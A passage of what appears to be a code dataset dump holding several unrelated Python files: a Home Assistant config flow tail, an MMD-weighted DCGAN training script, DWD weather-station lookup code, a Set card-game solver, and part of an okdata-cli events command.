self.async_set_unique_id(user_input[CONF_LOADZONE])\n self._abort_if_unique_id_configured()\n return self.async_create_entry(title=info[\"title\"], data=user_input)\n\n return self.async_show_form(\n step_id=\"user\", data_schema=DATA_SCHEMA, errors=errors\n )\n\n async def async_step_import(self, user_input):\n \"\"\"Handle import.\"\"\"\n await self.async_set_unique_id(user_input[CONF_LOADZONE])\n self._abort_if_unique_id_configured()\n\n return await self.async_step_user(user_input)\n\n\nclass CannotConnect(exceptions.HomeAssistantError):\n \"\"\"Error to indicate we cannot connect.\"\"\"\n","sub_path":"homeassistant/components/griddy/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69329526","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\n\n# used to load and 
transform popular CV datasets\nimport torchvision\nimport torchvision.transforms as transforms\n\n# plotting the graphs\nimport matplotlib.pyplot as plt\nfrom textwrap import wrap\n\n\n# to save and load numpy arrays\nfrom numpy import save as np_save\nimport numpy as np\n\n\n#import IPython.display\n\n# for MMD calculation\nfrom sklearn.metrics import pairwise_kernels, pairwise_distances\n\n# import datasets\nimport sys\nsys.path.append('../')\nfrom importlib import reload  # reload stopped being a builtin in Python 3\nfrom Datasets.loadDataset import loadDataset, getHelperClass, getEpochs, getChannels, getClasses\nreload(sys.modules[loadDataset.__module__])\n\n# import configuration\nimport config\nreload(config)\nfrom config import *\n\n\nfrom model_28 import Generator, Discriminator\nnumGenFilter=64\nnumDiscFilter=32\nimageSize = 28\n\n\ndef MMD2u(K, m, n):\n    \"\"\"The MMD^2_u unbiased statistic.\n    \"\"\"\n\n    # take the first m samples in the RKHS as Kx and the rest as Ky\n\n    Kx = K[:m, :m]\n    Ky = K[m:, m:]\n    Kxy = K[:m, m:]\n\n    # subtract the diagonal terms: the unbiased estimator excludes the i == j pairs\n    return 1.0 / (m * (m - 1.0)) * (Kx.sum() - Kx.diagonal().sum()) + \\\n        1.0 / (n * (n - 1.0)) * (Ky.sum() - Ky.diagonal().sum()) - \\\n        2.0 / (m * n) * Kxy.sum()\n    \ndef kernelTwoSampleTest(X, Y, kernel_function='rbf', iterations=10000,\n                        verbose=False, **kwargs):\n    \"\"\"Compute MMD^2_u for the kernel two-sample test. (Unlike the recipe this\n    is based on, the null distribution and p-value are not computed here, so\n    the iterations argument is unused.)\n\n    Note that extra parameters captured by **kwargs will be passed to\n    pairwise_kernels() as kernel parameters. E.g. if\n    kernel_two_sample_test(..., kernel_function='rbf', gamma=0.1),\n    then this will result in getting the kernel through\n    kernel_function(metric='rbf', gamma=0.1).\n    \"\"\"\n    \n    m = len(X)\n    n = len(Y)\n    \n    # flatten each torch tensor into a (batch, features) numpy array\n    X = X.numpy()\n    X = X.reshape(X.shape[0],-1)\n    Y = Y.numpy()\n    Y = Y.reshape(Y.shape[0],-1)\n    \n    XY = np.vstack([X, Y])\n\n    # calculate the kernel matrix given elements of both domains\n    K = pairwise_kernels(XY, metric=kernel_function, **kwargs)\n\n    mmd2u = MMD2u(K, m, n)\n    if verbose:\n        print(\"MMD^2_u = %s\" % mmd2u)\n\n    return mmd2u\n\n# first helper class and then primary class\n\ndef train(primaryFileName, helperFileName, primaryTrainLoader, helperTrainLoader, primaryInstances, numOutputChannels=1, learningRate = 0.0002, optimBetas=(0.5, 0.999), epochs = 5):\n    '''\n    Training for a Deep Convolutional Generative Adversarial Network\n    '''\n    \n    # define the model\n    G = Generator(numInputChannels,\n                  numGenFilter,\n                  numOutputChannels)\n    D = Discriminator(numOutputChannels,\n                      numDiscFilter)\n    lossFunction = nn.BCELoss()\n    genOptimiser = optim.Adam(G.parameters(),\n                              lr=learningRate,\n                              betas = optimBetas)\n    disOptimiser = optim.Adam(D.parameters(),\n                              lr=learningRate,\n                              betas = optimBetas)\n    discRealInput = torch.FloatTensor(batchSize,\n                                      numOutputChannels,\n                                      imageSize,\n                                      imageSize)\n    discFakeInput = torch.FloatTensor(batchSize,\n                                      numInputChannels,\n                                      1,\n                                      1)\n    fixedNoise = torch.FloatTensor(25,\n                                   numInputChannels,\n                                   1,\n                                   1)\n    fixedNoise.normal_(0,1)\n\n    discRealLabel = torch.FloatTensor(batchSize)\n    discFakeLabel = torch.FloatTensor(batchSize)\n    discRealLabel.fill_(1)\n    discFakeLabel.fill_(0)\n    \n    # for processing on a GPU\n    if cuda:\n        G = G.cuda()\n        D = D.cuda()\n\n        lossFunction = lossFunction.cuda()\n\n        discRealInput = discRealInput.cuda()\n        discFakeInput = discFakeInput.cuda()\n\n        discRealLabel = discRealLabel.cuda()\n        discFakeLabel = discFakeLabel.cuda()\n\n        fixedNoise = fixedNoise.cuda()\n\n    fixedNoiseVariable = Variable(fixedNoise)
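\n    \n    # (added editor's note, not part of the original file) In the loop below,\n    # helper-class batches train the discriminator's 'real' branch with a loss\n    # weighted by lambdaMMD * (1 - MMD^2_u(primary batch, helper batch)), so\n    # helper samples that resemble the primary class contribute more. Sketch:\n    #\n    #   mmd = 1 - kernelTwoSampleTest(primaryDataInstance, helperDataInstance)\n    #   lossRealDisc = lambdaMMD * mmd * BCE(D(helper batch), ones)\n    #\n    # assume that helper 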
primaryInstances are always more than primary primaryInstances\n # define primary Epochs and helper Epochs\n primaryEpochs = epochs\n helperEpochs = 10\n\n # for processing on a GPU\n if cuda:\n\n discRealInput = discRealInput.cuda()\n discFakeInput = discFakeInput.cuda()\n\n discRealLabel = discRealLabel.cuda()\n discFakeLabel = discFakeLabel.cuda()\n \n \n print (\"Starting training with helper class.\")\n plt.figure()\n\n # training with helper class\n for epoch in range(helperEpochs):\n for i, primaryData in enumerate(primaryTrainLoader, 0):\n for j, helperData in enumerate(helperTrainLoader, 0):\n \n #print ('Epoch : {} Primary Class Batch : {}. Helper Class Batch : {}.'.format(epoch+1,i+1,j+1))\n \n primaryDataInstance, primaryDataLabel = primaryData\n helperDataInstance, helperDataLabel = helperData\n \n \n # calculate MMD between two batches of data\n mmd = (1-kernelTwoSampleTest(primaryDataInstance, helperDataInstance))\n mmd = torch.from_numpy(np.asarray([mmd]))\n mmdVariable = Variable(mmd.float().cuda())\n \n # weight given to the term \n lambdaMMD = 1.0\n lambdaMMD = torch.from_numpy(np.asarray([lambdaMMD]))\n lambdaMMDVariable = Variable(lambdaMMD.float().cuda())\n \n D.zero_grad()\n \n # train GAN using helper data instance\n if cuda:\n helperDataInstance = helperDataInstance.cuda()\n\n discRealInput.copy_(helperDataInstance) \n discRealInputVariable = Variable(discRealInput)\n \n # should we treat this as 1 ??\n discRealLabelVariable = Variable(discRealLabel)\n discRealOutput = D(discRealInputVariable)\n lossRealDisc = lambdaMMDVariable*mmdVariable*lossFunction(discRealOutput,\n discRealLabelVariable)\n \n \n lossRealDisc.backward()\n\n # train discriminator on fake data\n discFakeInput.normal_(0,1)\n discFakeInputVariable = Variable(discFakeInput)\n discFakeInputGen = G(discFakeInputVariable)\n discFakeLabelVariable = Variable(discFakeLabel)\n\n discFakeOutput = D(discFakeInputGen.detach())\n lossFakeDisc = lossFunction(discFakeOutput,\n discFakeLabelVariable)\n lossFakeDisc.backward()\n disOptimiser.step()\n\n # train generator based on discriminator\n # for every epoch the gradients are reset to 0\n # the discriminator should start to confuse fake primaryInstances\n # with true primaryInstances\n\n G.zero_grad()\n\n genInputVariable = discFakeInputGen\n genOutputDisc = D(genInputVariable)\n\n lossGen = lossFunction(genOutputDisc,\n discRealLabelVariable)\n\n lossGen.backward()\n genOptimiser.step()\n \n # for every epoch show the image\n if (i==0) and epoch==(helperEpochs-1):\n\n #print ('Completed processing '+str(primaryInstances)+'for'+str(epoch)+'epochs.')\n\n # name for model and plot file\n folder, primaryClass, _ = primaryFileName.split('_')\n _, helperClass, helperInstances = helperFileName.split('_')\n \n fileName = folder + '_' + str(primaryClass) + '_' + str(helperClass) + '_' + \\\n str(primaryInstances) + '_' + str(helperInstances)\n \n # generate samples from trained generator\n genImage = G(fixedNoiseVariable)\n genImage = genImage.data\n genImage = genImage.cpu()\n genImage = torchvision.utils.make_grid(genImage, nrow=5)\n \n genImage = genImage/2 + 0.5\n genImage = genImage.permute(1,2,0)\n genImage = genImage.numpy()\n \n #print genImage.shape\n # plot the figure of generated samples and save\n fig = plt.figure()\n plt.imshow(genImage, cmap='gray')\n plt.axis('off')\n \n if primaryInstances < batchSize:\n discRealInput = torch.FloatTensor(primaryInstances,\n numOutputChannels,\n imageSize,\n imageSize)\n # why only one as width and height ? 
Passing through generator.\n discFakeInput = torch.FloatTensor(primaryInstances,\n numInputChannels,\n 1,\n 1)\n discRealLabel = torch.FloatTensor(primaryInstances)\n discFakeLabel = torch.FloatTensor(primaryInstances)\n discRealLabel.fill_(1)\n discFakeLabel.fill_(0)\n \n if cuda:\n\n discRealInput = discRealInput.cuda()\n discFakeInput = discFakeInput.cuda()\n\n discRealLabel = discRealLabel.cuda()\n discFakeLabel = discFakeLabel.cuda() \n \n print (\"Ending training with helper class.\")\n print (\"Starting training with primary class.\")\n \n # training with primary class\n for epoch in range(primaryEpochs):\n for i, data in enumerate(primaryTrainLoader, 0):\n \n #print ('Epoch : {} Primary Class Batch : {}.'.format(epoch+1,i+1))\n \n if i>10000:\n print (\"Done 2000 Iterations\")\n break\n\n # train discriminator on real data\n D.zero_grad()\n dataInstance, dataLabel = data\n\n if cuda:\n dataInstance = dataInstance.cuda()\n \n discRealInput.copy_(dataInstance)\n discRealInputVariable = Variable(discRealInput)\n discRealLabelVariable = Variable(discRealLabel)\n\n discRealOutput = D(discRealInputVariable)\n lossRealDisc = lossFunction(discRealOutput,\n discRealLabelVariable)\n \n lossRealDisc.backward()\n\n # train discriminator on fake data\n discFakeInput.normal_(0,1)\n discFakeInputVariable = Variable(discFakeInput)\n discFakeInputGen = G(discFakeInputVariable)\n\n discFakeLabelVariable = Variable(discFakeLabel)\n\n discFakeOutput = D(discFakeInputGen.detach())\n lossFakeDisc = lossFunction(discFakeOutput,\n discFakeLabelVariable)\n lossFakeDisc.backward()\n\n disOptimiser.step()\n\n # train generator based on discriminator\n # for every epoch the gradients are reset to 0\n # the discriminator should start to confuse fake primaryInstances\n # with true primaryInstances\n \n G.zero_grad()\n\n genInputVariable = discFakeInputGen\n genOutputDisc = D(genInputVariable)\n\n lossGen = lossFunction(genOutputDisc,\n discRealLabelVariable)\n\n lossGen.backward()\n genOptimiser.step()\n \n if (i==0) and epoch==(primaryEpochs-1) :\n\n primaryDataSet, primaryClass, primarInstances = primaryFileName.split('_')\n helperDataSet, helperClass, helperInstances = helperFileName.split('_')\n \n fileName = primaryDataSet + '_' + helperDataSet + '_' + str(primaryClass) + '_' + str(helperClass) + '_' + \\\n str(primaryInstances) + '_' + str(helperInstances)\n \n modelFileName = resultDir+'models/crossDataSetMMD'+'/'+primaryDataSet+'/'+fileName+'_'+str(epoch)+'.pt'\n plotFileName = resultDir+'plots/crossDataSetMMD'+'/'+primaryDataSet+'/'+fileName+'_'+str(epoch)+'.png'\n\n # save the model parameters in a file\n torch.save(G.state_dict(), modelFileName)\n\n # generate samples from trained generator\n genImage = G(fixedNoiseVariable)\n genImage = genImage.data\n genImage = genImage.cpu()\n genImage = torchvision.utils.make_grid(genImage, nrow=5)\n \n genImage = genImage/2 + 0.5\n genImage = genImage.permute(1,2,0)\n genImage = genImage.numpy()\n\n # plot the figure of generated samples and save\n fig = plt.figure()\n \n plt.imshow(genImage, cmap='gray')\n plt.axis('off')\n\n txt = 'Epoch: '+ str(epoch)\n fig.text(.45,.05,txt)\n if showImage==1:\n plt.show()\n '''\n IPython.display.clear_output(wait=True)\n IPython.display.display(plt.gcf())\n '''\n plt.savefig(plotFileName, bbox_inches='tight')\n plt.close('all')\n\n print (\"Done trining with primary class primaryInstances.\")\n\ndef trainSamples( primaryDataSet, helperDataSet, primaryClasses, primaryInstances, helperInstances):\n \n for cls in 
primaryClasses:\n for instance in primaryInstances:\n for helperInstance in helperInstances:\n\n # if the number of primary instances are larger than the number of helper\n # instances, no need to calculate MMD\n if instance > helperInstance:\n continue\n \n # the primary class is same as helper class in this case\n helperClass = cls\n\n print ('Primary Class: {} Helper Class: {} Primary Instances: {} Helper Instance {}'.\n format(cls,helperClass,instance,helperInstance))\n\n primaryFileName = primaryDataSet+'_'+str(cls)+'_'+str(instance)\n helperFileName = helperDataSet+'_'+str(helperClass)+'_'+str(helperInstance)\n \n \n x = loadDataset(primaryDataSet, cls, instance)\n y = loadDataset(helperDataSet, helperClass, helperInstance)\n \n \n primaryTrainLoader=torch.utils.data.DataLoader(x,\n batch_size=batchSize, \n shuffle=True,\n num_workers=4,\n drop_last = False)\n helperTrainLoader=torch.utils.data.DataLoader(y,\n batch_size=batchSize, \n shuffle=True,\n num_workers=4,\n drop_last=True)\n numOutputChannels = getChannels(primaryDataSet)\n epochs = getEpochs(primaryDataSet, instance)\n\n train(primaryFileName, helperFileName, \n primaryTrainLoader, helperTrainLoader, \n instance, numOutputChannels, \n epochs=epochs) \n\n\nif __name__=='__main__':\n \n # primary and helper dataset are one here\n primaryDataSet = 'MNIST'\n helperDataSet = 'SVHN-BW'\n primaryClasses = [1,2,3,4,5,6,7,8,9]\n primaryInstances = [100,500,1000]\n helperInstances = [1000,5000]\n trainSamples(primaryDataSet, helperDataSet, primaryClasses, primaryInstances, helperInstances)","sub_path":"DCGAN/DCGAN_MMD_CD_train.py","file_name":"DCGAN_MMD_CD_train.py","file_ext":"py","file_size_in_byte":16500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646481391","text":"import logging\nfrom datetime import datetime\nfrom typing import Union, Optional, Tuple\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial.ckdtree import cKDTree\n\nfrom wetterdienst import Parameter, TimeResolution, PeriodType\nfrom wetterdienst.dwd.observations.fileindex import (\n create_file_index_for_climate_observations,\n)\nfrom wetterdienst.dwd.observations.metaindex import (\n create_meta_index_for_climate_observations,\n)\nfrom wetterdienst.dwd.metadata.column_names import DWDMetaColumns\nfrom wetterdienst.exceptions import InvalidParameterCombination\nfrom wetterdienst.dwd.util import (\n check_parameters,\n parse_enumeration_from_template,\n parse_datetime,\n)\nfrom wetterdienst.util.geo import Coordinates\n\nKM_EARTH_RADIUS = 6371\n\nlogger = logging.getLogger(__name__)\n\n\ndef metadata_for_climate_observations(\n parameter: Union[Parameter, str],\n time_resolution: Union[TimeResolution, str],\n period_type: Union[PeriodType, str],\n) -> pd.DataFrame:\n \"\"\"\n A main function to retrieve metadata for a set of parameters that creates a\n corresponding csv.\n STATE information is added to metadata for cases where there's no such named\n column (e.g. STATE) in the pandas.DataFrame.\n For this purpose we use daily precipitation data. 
That has two reasons:\n\n    - daily precipitation data has a STATE information combined with a city\n    - daily precipitation data is the most common data served by the DWD\n\n    :param parameter: Observation measure\n    :param time_resolution: Frequency/granularity of measurement interval\n    :param period_type: Recent or historical files\n\n    :return: List of stations for selected parameters\n    \"\"\"\n\n    parameter = parse_enumeration_from_template(parameter, Parameter)\n    time_resolution = parse_enumeration_from_template(time_resolution, TimeResolution)\n    period_type = parse_enumeration_from_template(period_type, PeriodType)\n\n    meta_index = create_meta_index_for_climate_observations(\n        parameter, time_resolution, period_type\n    )\n\n    meta_index[DWDMetaColumns.HAS_FILE.value] = False\n\n    file_index = create_file_index_for_climate_observations(\n        parameter, time_resolution, period_type\n    )\n\n    meta_index.loc[\n        meta_index.loc[:, DWDMetaColumns.STATION_ID.value].isin(\n            file_index[DWDMetaColumns.STATION_ID.value]\n        ),\n        DWDMetaColumns.HAS_FILE.value,\n    ] = True\n\n    return meta_index\n\n\ndef get_nearby_stations_by_number(\n    latitude: float,\n    longitude: float,\n    num_stations_nearby: int,\n    parameter: Union[Parameter, str],\n    time_resolution: Union[TimeResolution, str],\n    period_type: Union[PeriodType, str],\n    minimal_available_date: Optional[Union[datetime, str]] = None,\n    maximal_available_date: Optional[Union[datetime, str]] = None,\n) -> pd.DataFrame:\n    \"\"\"\n    Provides a list of weather station ids for the requested data\n\n    :param latitude: Latitude of location to search for nearest\n    weather station\n    :param longitude: Longitude of location to search for nearest\n    weather station\n    :param minimal_available_date: Start date of timespan where measurements\n    should be available\n    :param maximal_available_date: End date of timespan where measurements\n    should be available\n    :param parameter: Observation measure\n    :param time_resolution: Frequency/granularity of measurement interval\n    :param period_type: Recent or historical files\n    :param num_stations_nearby: Number of stations that should be nearby\n\n    :return: DataFrames with valid stations in radius per\n    requested location\n\n    \"\"\"\n    if num_stations_nearby <= 0:\n        raise ValueError(\"'num_stations_nearby' has to be at least 1.\")\n\n    parameter = parse_enumeration_from_template(parameter, Parameter)\n    time_resolution = parse_enumeration_from_template(time_resolution, TimeResolution)\n    period_type = parse_enumeration_from_template(period_type, PeriodType)\n\n    if not check_parameters(parameter, time_resolution, period_type):\n        raise InvalidParameterCombination(\n            f\"The combination of {parameter.value}, {time_resolution.value}, \"\n            f\"{period_type.value} is invalid.\"\n        )\n\n    minimal_available_date = (\n        minimal_available_date\n        if not minimal_available_date or isinstance(minimal_available_date, datetime)\n        else parse_datetime(minimal_available_date)\n    )\n    # note: this previously tested minimal_available_date, which skipped parsing\n    # of the maximal date whenever no minimal date was given\n    maximal_available_date = (\n        maximal_available_date\n        if not maximal_available_date or isinstance(maximal_available_date, datetime)\n        else parse_datetime(maximal_available_date)\n    )\n\n    if minimal_available_date and maximal_available_date:\n        if minimal_available_date > maximal_available_date:\n            raise ValueError(\n                \"'minimal_available_date' has to be before \" \"'maximal_available_date'\"\n            )\n\n    coords = Coordinates(np.array(latitude), np.array(longitude))\n\n    metadata = metadata_for_climate_observations(\n        parameter, time_resolution, period_type\n    )
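\n\n    # (added editor's note, not part of the original file) From here on, stations\n    # without a downloadable file or outside the requested availability window are\n    # dropped, then a k-d tree over the station coordinates in radians returns the\n    # nearest neighbours; the euclidean distance in radian space is scaled by\n    # KM_EARTH_RADIUS, a rough small-angle approximation of great-circle distance.\n\n    # Filter only for stations that have a 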
\n metadata = metadata[metadata[DWDMetaColumns.HAS_FILE.value].values]\n\n if minimal_available_date:\n metadata = metadata[\n metadata[DWDMetaColumns.FROM_DATE.value] <= minimal_available_date\n ]\n\n if maximal_available_date:\n metadata = metadata[\n metadata[DWDMetaColumns.TO_DATE.value] >= maximal_available_date\n ]\n\n metadata = metadata.reset_index(drop=True)\n\n distances, indices_nearest_neighbours = _derive_nearest_neighbours(\n metadata.LAT.values, metadata.LON.values, coords, num_stations_nearby\n )\n\n distances = pd.Series(distances)\n indices_nearest_neighbours = pd.Series(indices_nearest_neighbours)\n\n # If num_stations_nearby is higher than the actual number of stations,\n # further indices and distances are added which have to be filtered out\n distances = distances[: min(metadata.shape[0], num_stations_nearby)]\n indices_nearest_neighbours = indices_nearest_neighbours[\n : min(metadata.shape[0], num_stations_nearby)\n ]\n\n distances_km = np.array(distances * KM_EARTH_RADIUS)\n\n metadata_location = metadata.iloc[indices_nearest_neighbours, :].reset_index(\n drop=True\n )\n\n metadata_location[DWDMetaColumns.DISTANCE_TO_LOCATION.value] = distances_km\n\n if metadata_location.empty:\n logger.warning(\n f\"No weather stations were found for coordinate \"\n f\"{latitude}°N and {longitude}°E \"\n )\n\n return metadata_location\n\n\ndef get_nearby_stations_by_distance(\n latitude: float,\n longitude: float,\n max_distance_in_km: float,\n parameter: Union[Parameter, str],\n time_resolution: Union[TimeResolution, str],\n period_type: Union[PeriodType, str],\n minimal_available_date: Optional[Union[datetime, str]] = None,\n maximal_available_date: Optional[Union[datetime, str]] = None,\n) -> pd.DataFrame:\n \"\"\"\n Provides a list of weather station ids for the requested data\n\n :param latitude: Latitude of location to search for nearest\n weather station\n :param longitude: Longitude of location to search for nearest\n weather station\n :param minimal_available_date: Start date of timespan where measurements\n should be available\n :param maximal_available_date: End date of timespan where measurements\n should be available\n :param parameter: Observation measure\n :param time_resolution: Frequency/granularity of measurement interval\n :param period_type: Recent or historical files\n :param max_distance_in_km: Alternative filtering criteria, maximum\n distance to location in km\n\n :return: DataFrames with valid stations in radius per\n requested location\n \"\"\"\n # Theoretically a distance of 0 km is possible\n if max_distance_in_km < 0:\n raise ValueError(\"'max_distance_in_km' has to be at least 0.0.\")\n\n metadata = metadata_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n all_nearby_stations = get_nearby_stations_by_number(\n latitude,\n longitude,\n metadata.shape[0],\n parameter,\n time_resolution,\n period_type,\n minimal_available_date,\n maximal_available_date,\n )\n\n nearby_stations_in_distance = all_nearby_stations[\n all_nearby_stations[DWDMetaColumns.DISTANCE_TO_LOCATION.value]\n <= max_distance_in_km\n ]\n\n return nearby_stations_in_distance.reset_index(drop=True)\n\n\ndef _derive_nearest_neighbours(\n latitudes_stations: np.array,\n longitudes_stations: np.array,\n coordinates: Coordinates,\n num_stations_nearby: int = 1,\n) -> Tuple[Union[float, np.ndarray], np.ndarray]:\n \"\"\"\n A function that uses a k-d tree algorithm to obtain the nearest\n neighbours to coordinate pairs\n\n Args:\n latitudes_stations (np.array): latitude values of stations being compared to\n the coordinates\n longitudes_stations (np.array): longitude values of stations being compared to\n the coordinates\n coordinates (Coordinates): the coordinates for which the nearest neighbour\n is searched\n num_stations_nearby: Number of stations that should be nearby\n\n Returns:\n Tuple of distances and ranks of nearest to most distant stations\n \"\"\"\n points = np.c_[np.radians(latitudes_stations), np.radians(longitudes_stations)]\n distance_tree = cKDTree(points)\n return distance_tree.query(\n coordinates.get_coordinates_in_radians(), k=num_stations_nearby\n )\n
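# A minimal sketch of the nearest-station lookup performed by
# _derive_nearest_neighbours above, assuming scipy and numpy are available:
# build a k-d tree on station coordinates in radians, query k neighbours,
# and scale the distances by an Earth radius of roughly 6371 km. Like the
# KM_EARTH_RADIUS scaling above, this treats the Euclidean distance in
# radian space as an arc length, which only holds approximately for small
# separations.
import numpy as np
from scipy.spatial import cKDTree

stations = np.radians([[52.52, 13.40], [48.14, 11.58], [53.55, 9.99]])
tree = cKDTree(stations)

query = np.radians([[50.11, 8.68]])  # an illustrative coordinate pair
distances, indices = tree.query(query, k=2)
print(indices[0], distances[0] * 6371)  # nearest indices, approximate km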
","sub_path":"wetterdienst/dwd/observations/stations.py","file_name":"stations.py","file_ext":"py","file_size_in_byte":10122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"188991248","text":"from sets_types import Card, Color, Shape, Filling, Count, CardSet\nfrom typing import List, Tuple, Union\nfrom itertools import chain, combinations\n \n\nclass Table:\n def __init__(self, cards: List[List[Card]]):\n self.cards = cards\n \n def get_sets(self) -> List[CardSet]:\n cards = chain.from_iterable(self.cards)\n combs = combinations(cards, 3)\n sets = []\n for comb in combs:\n try:\n sets.append(CardSet(*comb))\n except ValueError:\n pass\n return sets\n\n def print(self, highlight: Union[List[Card], CardSet]):\n out = []\n for row in self.cards:\n row_p = []\n for card in row:\n card_p = card.print(card in highlight)\n if not row_p:\n row_p = card_p\n continue\n row_p = list(map(lambda x: ''.join(x), zip(row_p, card_p)))\n out.append('\\n'.join(row_p))\n print('\\n'.join(out)) \n\n\ndef detect_table(data: List[List[str]]) -> Table:\n table = []\n for x in data:\n row = []\n for y in x:\n row.append(Card.from_string(y))\n table.append(row)\n return Table(table)\n \n\ndef main(data: List[List[str]]) -> None:\n table = detect_table(data)\n sets = table.get_sets()\n print(f\"Number of sets: {len(sets)}\")\n \n for i, x in enumerate(sets):\n print(f'Set {i+1}:')\n table.print(highlight=x)\n\n\nif __name__ == '__main__':\n print('Starting sets checker')\n data = [\n ['gde3','goe3','pwe1','roe1','pof2'],\n ['pde3','rdf1','roe3','gdf1','poe1'],\n ['pod2','gwd3','gwf2','rwf3','rwe2'],\n ]\n main(data)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509431736","text":"import re\nimport json\n\nfrom okdata.sdk.event.post_event import PostEvent\nfrom okdata.sdk.elasticsearch.queries import ElasticsearchQueries\nfrom okdata.sdk.event.event_stream_client import EventStreamClient\n\nfrom okdata.cli.command import BaseCommand, BASE_COMMAND_OPTIONS\nfrom okdata.cli.io import read_json\nfrom okdata.cli.output import create_output\n\n\nclass EventsCommand(BaseCommand):\n __doc__ = f\"\"\"Oslo :: Events\n\nUsage:\n okdata events describe-stream <dataset-uri> [options]\n okdata events create-stream <dataset-uri> [--skip-raw] [options]\n okdata events delete-stream <dataset-uri> [options]\n okdata events enable-subscription <dataset-uri> [options]\n okdata events disable-subscription <dataset-uri> [options]\n okdata events enable-sink <dataset-uri> --sink-type=<sink_type> [options]\n okdata events disable-sink <dataset-uri> --sink-type=<sink_type> [options]\n okdata events put <dataset-uri> [(--file=<file> | --data=<data>) options]\n okdata events stat <dataset-uri> [options]\n\nExamples:\n okdata events describe-stream ds:my-dataset-id/1\n okdata events describe-stream my-dataset-id/1\n okdata events describe-stream my-dataset-id\n okdata events create-stream 
ds:my-dataset-id/1\n okdata events enable-sink ds:my-dataset-id/1 --sink-type=s3\n okdata events disable-sink ds:my-dataset-id/1 --sink-type=elasticsearch\n echo '{{\"hello\": \"world\"}}' | okdata events put ds:my-dataset-id/1\n echo '[{{\"hello\": \"world\"}}, {{\"world\": \"hello\"}}]' | okdata events put ds:my-dataset-id/1\n cat /tmp/event.json | okdata events put ds:my-dataset-id/1\n okdata events put ds:my-dataset-id/1 --data='{{\"hello\": \"world\"}}'\n okdata events put ds:my-dataset-id/1 --file=/tmp/event.json\n okdata events stat ds:my-dataset-id\n okdata events stat ds:my-dataset-id --format=json | jq \".last_hour.events\"\n\nOptions:{BASE_COMMAND_OPTIONS}\n \"\"\"\n\n def __init__(self):\n super().__init__()\n env = self.opt(\"env\")\n\n self.sdk = EventStreamClient(env=env)\n self.post_event_sdk = PostEvent(env=env)\n self.esq_sdk = ElasticsearchQueries(env=env)\n\n self.handler = self.default\n\n def default(self):\n self.log.info(\"EventsCommand.handle()\")\n\n if self.cmd(\"describe-stream\"):\n self.describe_stream()\n elif self.cmd(\"create-stream\"):\n self.create_stream()\n elif self.cmd(\"delete-stream\"):\n self.delete_stream()\n elif self.cmd(\"enable-subscription\"):\n self.enable_subscription()\n elif self.cmd(\"disable-subscription\"):\n self.disable_subscription()\n elif self.cmd(\"enable-sink\"):\n self.enable_sink()\n elif self.cmd(\"disable-sink\"):\n self.disable_sink()\n elif self.cmd(\"put\"):\n self.put_event()\n elif self.cmd(\"stat\"):\n self.event_stat()\n else:\n self.help()\n\n def describe_stream(self):\n dataset_id, version = self._resolve_dataset_uri()\n\n event_stream = self.sdk.get_event_stream_info(dataset_id, version)\n subscribable = self.sdk.get_subscribable(dataset_id, version)\n sinks = self.sdk.get_sinks(dataset_id, version)\n\n if self.opt(\"format\") == \"json\":\n out = {}\n out[\"stream\"] = event_stream\n out[\"subscribable\"] = subscribable\n out[\"sinks\"] = sinks\n self.print(\"\", out)\n return\n\n out = create_output(self.opt(\"format\"), \"events_stream_config.json\")\n out.output_singular_object = True\n out.add_row(event_stream)\n self.print(f\"Event stream: {dataset_id}/{version}\", out)\n\n out = create_output(self.opt(\"format\"), \"events_subscribable_config.json\")\n out.output_singular_object = True\n out.add_row(subscribable)\n self.print(\"\\n\\nSubscribable for event stream:\", out)\n\n out = create_output(self.opt(\"format\"), \"events_sink_config.json\")\n out.add_rows(sinks)\n self.print(\"\\n\\nSinks for event stream:\", out)\n\n def create_stream(self):\n dataset_id, version = self._resolve_dataset_uri()\n create_raw = not self.opt(\"skip-raw\")\n event_stream = self.sdk.create_event_stream(\n dataset_id, version, create_raw=create_raw\n )\n out = create_output(self.opt(\"format\"), \"events_stream_config.json\")\n out.output_singular_object = True\n out.add_row(event_stream)\n self.print(f\"Creating event stream for {dataset_id}/{version}\", out)\n\n def delete_stream(self):\n dataset_id, version = self._resolve_dataset_uri()\n event_stream = self.sdk.delete_event_stream(dataset_id, version)\n out = create_output(self.opt(\"format\"), \"events_stream_config.json\")\n out.output_singular_object = True\n out.add_row(event_stream)\n self.print(f\"Deleting event stream for {dataset_id}/{version}\", out)\n\n def enable_subscription(self):\n dataset_id, version = self._resolve_dataset_uri()\n subscribable = self.sdk.enable_subscription(dataset_id, version)\n out = create_output(self.opt(\"format\"), 
\"events_subscribable_config.json\")\n out.output_singular_object = True\n out.add_row(subscribable)\n self.print(\n f\"Enabling subscription for event stream {dataset_id}/{version}\", out\n )\n\n def disable_subscription(self):\n dataset_id, version = self._resolve_dataset_uri()\n subscribable = self.sdk.disable_subscription(dataset_id, version)\n out = create_output(self.opt(\"format\"), \"events_subscribable_config.json\")\n out.output_singular_object = True\n out.add_row(subscribable)\n self.print(\n f\"Disabling subscription for event stream {dataset_id}/{version}\", out\n )\n\n def enable_sink(self):\n dataset_id, version = self._resolve_dataset_uri()\n sink_type = self.opt(\"sink-type\")\n sink = self.sdk.enable_sink(dataset_id, version, sink_type=sink_type)\n out = create_output(self.opt(\"format\"), \"events_sink_config.json\")\n out.output_singular_object = True\n out.add_row(sink)\n self.print(f\"Enabling {sink_type} sink for {dataset_id}/{version}\", out)\n\n def disable_sink(self):\n dataset_id, version = self._resolve_dataset_uri()\n sink_type = self.opt(\"sink-type\")\n response = self.sdk.disable_sink(dataset_id, version, sink_type=sink_type)\n if self.opt(\"format\") == \"json\":\n self.print(\"\", response)\n return\n self.print(response[\"message\"])\n\n def put_event(self):\n dataset_id, version = self._resolve_dataset_uri()\n out = create_output(self.opt(\"format\"), \"events_put_event_config.json\")\n out.output_singular_object = True\n if self.opt(\"data\") is not None:\n payload = json.loads(self.opt(\"data\"))\n else:\n payload = 